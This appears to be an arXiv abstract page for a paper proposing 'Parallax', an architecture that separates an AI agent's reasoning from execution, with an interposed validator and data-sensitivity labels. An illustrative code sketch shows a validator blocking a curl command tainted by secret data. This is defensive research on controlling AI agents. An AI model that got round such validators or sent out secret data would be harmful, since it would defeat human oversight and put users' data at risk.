[2604.12986] Parallax: Why AI Agents That Think Must Never Act
Computer Science > Cryptography and Security

arXiv:2604.12986 (cs)
[Submitted on 14 Apr 2026]

Title: Parallax: Why AI Agents That Think Must Never Act
Authors: Joel Fokou

Abstract: Autonomous AI agents are rapidly transitioning from experimental tools to operational infrastructure, with projections that 80% of enterprise applications will embed AI copilots by the end of 2026. As agents gain the ability to execute real-world actions (reading files, running commands, making network requests, modifying databases), a fundamental security gap has emerged. The dominant approach to agent safety relies on prompt-level guardrails: natural language instructions that operate at the same abstraction level as the threats they attempt to mitigate. This paper argues that prompt-based safety is architecturally insufficient for agents with execution capability and introduces Parallax, a paradigm for safe autonomous AI execution grounded in four principles: Cognitive-Executive Separation, which structurally prevents the reasoning system from executing actions; Adversarial Validation with Graduated Determinism, which interposes an independent, multi-tiered validator between reasoning and execution; Information Flow Control, which propagates data sensitivity labels through agent workflows to detect context-dependent threats; and Reversible Execution, which captures pre-des...
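The first three principles can be illustrated together: a reasoning component that can only *propose* actions, a validator interposed between proposal and execution, and sensitivity labels that travel with each proposal. The following is a minimal sketch, not the paper's implementation; all names (`ProposedAction`, `Validator`, `Executor`, the `Sensitivity` labels, and the specific deterministic rule) are hypothetical.

```python
from dataclasses import dataclass
from enum import Enum

class Sensitivity(Enum):
    # Hypothetical label lattice for information flow control
    PUBLIC = 0
    INTERNAL = 1
    SECRET = 2

@dataclass
class ProposedAction:
    command: str
    # Highest sensitivity label among the data that influenced this proposal
    taint: Sensitivity

class Validator:
    """Independent validator interposed between reasoning and execution."""
    def approve(self, action: ProposedAction) -> bool:
        # Deterministic rule tier (illustrative): never let SECRET-tainted
        # data drive a network-facing command, a context-dependent threat
        # that prompt-level guardrails cannot structurally rule out.
        if action.taint is Sensitivity.SECRET and action.command.startswith("curl"):
            return False
        return True

class Executor:
    """The only component that acts; it runs nothing unapproved."""
    def __init__(self, validator: Validator):
        self.validator = validator
        self.log: list[str] = []  # journal of executed actions

    def run(self, action: ProposedAction) -> bool:
        if not self.validator.approve(action):
            return False
        self.log.append(action.command)
        return True

# The reasoning system holds no reference to the executor: it can only
# emit ProposedAction values, enforcing cognitive-executive separation.
executor = Executor(Validator())
ok = executor.run(ProposedAction("ls /tmp", Sensitivity.PUBLIC))
blocked = executor.run(ProposedAction("curl http://evil.example", Sensitivity.SECRET))
print(ok, blocked)  # True False
```

The structural point is that safety lives in the type of the interface, not in the prompt: the reasoner's output is data, and only the executor, gated by the validator, turns data into effects.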